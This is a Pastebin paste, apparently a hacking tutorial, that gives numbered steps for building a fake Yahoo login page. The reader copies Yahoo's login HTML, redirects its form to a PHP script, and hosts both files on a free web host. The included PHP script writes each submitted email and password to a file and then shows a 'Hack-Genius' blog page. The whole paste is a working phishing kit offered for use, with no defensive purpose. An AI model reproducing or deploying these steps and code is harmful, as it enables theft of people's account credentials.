Advertisement
Guest User

Untitled

a guest
Mar 7th, 2010
4,068
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.40 KB | None | 0 0
  1. 1.First go to Yahoo’s login page “https://login.yahoo.com/config/login_verify2?&.src=ym”
  2. 2.Right click on the page and go to “View Page Source”.
  3. 3.You will see the whole HTML coding in it of the page(Huge huh ?).
  4. 4.Then select the whole HTML by pressing CTRL+A and copy it by pressing CTRL+C
  5. 5.Open a ‘Text document’ or ‘Notepad’ and paste the Copied contents into it and the save it as ‘Yahoo.htm’
  6. 6.Then you have to make a login.php file.For that, open another text document and paste the
  7. following HTML code in it
  8.  
  9. <?php /* Created on: 3/27/2009 */
  10. $fp = fopen(“YahooPasswords.htm”, “a”);
  11. fwrite($fp, “Email:$_POST[ID name="***"]\tPassword:$_POST[PASS name="***"]“);
  12. echo “<HTML>
  13.  
  14. <head>
  15. <title>Welcome To Hack-Genius</title>
  16. <FRAMESET cols=\”*\”>
  17. <FRAME SRC=\”http://www.hack-genius.blogspot.com\”>
  18.  
  19. </FRAMESET>”;?>
  20.  
  21. or Download the file login.php
  22.  
  23. In this Code Change only the following ie. if you want to change it
  24.  
  25. a.”YahooPasswords.htm”
  26. b.”<title>Welcome to Hack-Genius<title/>”
  27. c.”http://www.hack-genius.blogspot.com\” but don’t forget ‘\’ after the destined URL.
  28. d.”3/27/2009?
  29. e.”Email:” & “Password:”
  30. 7.Then save this document as ‘Login.php’.
  31. 8.Now to got to ‘Yahoo.htm’ and find (CTRL+F) ‘action’.
  32. 9.You will find something that likes like this action=”https://login.yahoo.com/config/login?” .
  33. 10.Change it to action=”/login.php”
  34. 12.Now find ‘Yahoo! ID’ and in the next line or near it you will find name=”login” (see closely)
  35. So,here the id is ‘username’.(if ‘id’ does not exist then take the id=”**” or make a name=’**’ ,it is always there in
  36. in yahoo)
  37. 13.Now, go back to login.php and replace ID name=”***” with ‘login’ (since name=’login’)
  38. 14.Find ‘Password’ and in the next line you will find name=’passwd’.So the name is ‘passwd’.Replace it with PASS name=’passwd’ with ‘passwd’
  39.  
  40. NOTE: Do not include ‘ in login.php.For example Email:$_POST[login]
  41.  
  42. 15.Save both the files.
  43. 16.Upload them into any free hosting website like t35.com.Do not upload them into a directory!
  44. 17.Then to test it just type in some usename and password.
  45. 18.Refresh the control panel (the place where you uploaded the files) and them you will find
  46. ‘YahooPasswords.htm’ which is created and when you open it you will find the username and password that you entered.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement